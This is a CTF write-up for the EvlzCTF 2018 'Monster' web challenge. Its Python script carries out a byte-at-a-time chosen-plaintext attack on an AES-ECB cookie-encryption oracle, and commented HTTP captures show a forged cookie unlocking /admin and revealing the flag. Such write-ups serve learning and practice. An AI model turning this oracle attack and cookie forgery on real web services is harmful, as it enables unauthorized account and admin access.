https://evlzctf.in/challenges#Monster EvlzCTF 2018 - web 200 writeup

Monster.py

import urllib,urllib2,cookielib
import requests
import re
import json,string
# Chosen plaintext attack on AES by Bongtrop Inw Za 007

def register(uname):
	s=requests.Session()
	res1=s.get('http://35.200.197.38:8014/register')
	m=re.search(r'name="csrf_token" type="hidden" value="(.+?)">',res1.content)
	csrf=m.group(1)
	res2=s.post('http://35.200.197.38:8014/register', data={"csrf_token":csrf,"username": uname, "password": "longcatz1"})
	res = s.get('http://35.200.197.38:8014/')
	return s.cookies['test'].decode('base64')

def encrypt(plaintext):
	jsonData = json.loads(requests.get('http://35.200.197.38:8014/encryptcookie?plaintext='+plaintext).content)
	return jsonData['ciphertext']

flag=''
for x in xrange(15,-1,-1):
	dataUser = x*"G"
	testCookie = register(dataUser)
	print dataUser
	print testCookie
	for i in string.printable:
		xxx=dataUser+flag+urllib.quote(i)
		encrypted = encrypt(xxx)
		print xxx,encrypted
		if encrypted in testCookie:
			print flag
			flag+=i
			break
	pass
print flag

# 1.) http://35.200.197.38:8014/sitemap.xml > /encryptcookie?plaintext=
# 2.) register user = RRRRRRRRRRR > get token > 5b6c570de94f09c669d89b8987824926
# run script
# RRRRRRRRRRR:00 5c210c34a6103e2e73eef74573b6477f
# RRRRRRRRRRR:01 1d12dd35304456e58e55bfb70f485575
# RRRRRRRRRRR:02 b42afdee10b47245c095d7f42cb4a0bf

# GET /encryptcookie?plaintext=RRRRRRRRRRR:1 HTTP/1.1
# Host: 35.200.197.38:8014
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
# Accept-Encoding: gzip, deflate
# Accept-Language: en-US,en;q=0.9
# Cookie: test=NmYyNTUwZTRjYzVlNjhmOWVjYTFjM2Q1Y2IxMzhmYjE=; remember_token=admin|3a73995233e842ef5f531d63f1d2f48d7e27063d2fc234577585166942b49b9290c9dc2121e57d423a7f55e29e156381bc781f23b79aff97bd59cd172a0296ca; session=.eJwlj8tqAzEMAP_F5xxWT1v5mUW2JBpKU9hNTqX_3oXOfWDmp-115PnR7q_jnbe2P6LdGxlHSllNm66KBmBLBPsCXEgC6FkiqjQucM2NgU1wCA8MmyoBY9LyDp2Z1Lhy69rJ2Yxq9FwaoRNY0rZKzIIe4XOF82W2W1vnUfvr-zOfV48sHFpXSw3oxCO8KKZPg8FSulFHc2S5vPeZx_-Ex9fj2X7_APfeP9k.DWF3jg.ZifzFK0gyVRQEvWBHkGSir8XQmc
# Connection: close

# HTTP/1.1 200 OK
# Server: gunicorn/19.7.1
# Date: Sun, 11 Feb 2018 08:10:14 GMT
# Connection: close
# Content-Type: application/json
# Cache-Control: public, max-age=0
# Pragma: no-cache
# Expires: 0
# Content-Length: 55

# {
#   "ciphertext": "1735ec0a1ffa9dc0d5950f7bc02bbb3d"
# }


# 1735ec0a1ffa9dc0d5950f7bc02bbb3d > b64 > MTczNWVjMGExZmZhOWRjMGQ1OTUwZjdiYzAyYmJiM2Q=


# GET /admin HTTP/1.1
# Host: 35.200.197.38:8014
# Cache-Control: max-age=0
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
# Referer: http://35.200.197.38:8014/login
# Accept-Encoding: gzip, deflate
# Accept-Language: en-US,en;q=0.9
# Cookie: test=MTczNWVjMGExZmZhOWRjMGQ1OTUwZjdiYzAyYmJiM2Q=;

#         <center><h1>evlz{aes_des_xor_hex}ctf</h1></center>